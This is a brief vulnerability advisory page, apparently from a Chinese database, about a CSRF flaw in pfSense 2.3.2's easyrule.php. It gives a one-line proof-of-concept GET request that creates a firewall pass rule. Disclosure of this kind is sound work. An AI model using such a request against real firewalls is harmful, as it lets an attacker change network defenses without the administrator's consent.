pfsense 2.3.2: CSRF

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Description: The easyrule.php script is vulnerable to CSRF, which allows an attacker to create or delete firewall rules via CSRF. Proof of Concept: ``` GET /easyrule.php?action=pass&int=LAN&proto=any&src=192.168.1.1&dst=192.168.1.1&dstport=80&ipproto=inet ```

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息